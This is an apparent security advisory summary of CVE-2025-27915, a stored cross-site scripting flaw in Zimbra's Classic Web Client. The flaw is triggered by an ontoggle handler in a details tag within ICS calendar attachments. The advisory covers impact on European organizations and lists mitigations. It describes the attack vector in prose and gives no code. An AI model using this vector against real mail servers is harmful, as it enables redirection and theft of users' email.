CVE-2025-27915 is a stored cross-site scripting (XSS) vulnerability identified in the Classic Web Client of Zimbra Collaboration Suite (ZCS) versions 9.0, 10.0, and 10.1. The root cause is insufficient sanitization of HTML content embedded within ICS calendar files attached to emails. Specifically, the vulnerability exploits the ontoggle event handler inside a <details> HTML tag, which allows embedded JavaScript to execute when a user views a maliciously crafted email containing a malicious ICS entry. This JavaScript runs within the context of the victim's authenticated session, enabling attackers to perform unauthorized actions such as modifying email filters to redirect incoming messages to attacker-controlled addresses. Such actions can facilitate data exfiltration, interception of sensitive communications, and further compromise of the victim's account. The vulnerability requires the victim to open or preview the malicious email, implying user interaction is necessary. The CVSS 3.1 base score is 5.4, reflecting medium severity with network attack vector, low attack complexity, requiring privileges and user interaction, and impacting confidentiality and integrity but not availability. No patches or exploits are currently publicly available, but the vulnerability is publicly disclosed and should be addressed promptly. The CWE classification is CWE-79, indicating cross-site scripting. The scope is limited to the Classic Web Client interface of Zimbra Collaboration, a widely used enterprise email and collaboration platform.

For European organizations, this vulnerability poses a significant risk to the confidentiality and integrity of email communications. Successful exploitation can lead to unauthorized email redirection, allowing attackers to intercept sensitive information, conduct phishing campaigns, or exfiltrate data. This is particularly critical for sectors handling sensitive data such as finance, government, healthcare, and critical infrastructure. The ability to manipulate email filters can facilitate persistent access and stealthy data theft. Additionally, compromised accounts can be leveraged for lateral movement within networks, increasing the overall risk posture. Given the widespread use of Zimbra in European enterprises and public institutions, the vulnerability could impact a large number of users if exploited. Although exploitation requires user interaction and authenticated access, the medium severity rating reflects the potential for significant damage if these conditions are met. The lack of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, especially as attackers may develop exploits following public disclosure.

Organizations should immediately assess their Zimbra Collaboration Suite deployments to identify affected versions (9.0, 10.0, 10.1 Classic Web Client). Although no official patches are currently listed, monitoring vendor advisories for updates is critical. In the interim, implement strict email filtering to block or quarantine emails containing ICS attachments from untrusted sources. Disable automatic preview of emails or ICS attachments in the Classic Web Client to reduce the risk of inadvertent execution. Educate users about the risks of opening unexpected calendar invites or attachments, emphasizing caution with ICS files. Review and restrict permissions to limit the ability of compromised accounts to modify email filters or forwarding rules. Employ web application firewalls (WAFs) with rules targeting XSS patterns in HTTP requests to the Zimbra web interface. Conduct regular audits of email filter configurations to detect unauthorized changes. Finally, consider upgrading to newer Zimbra versions or alternative collaboration platforms if patches are delayed or unavailable.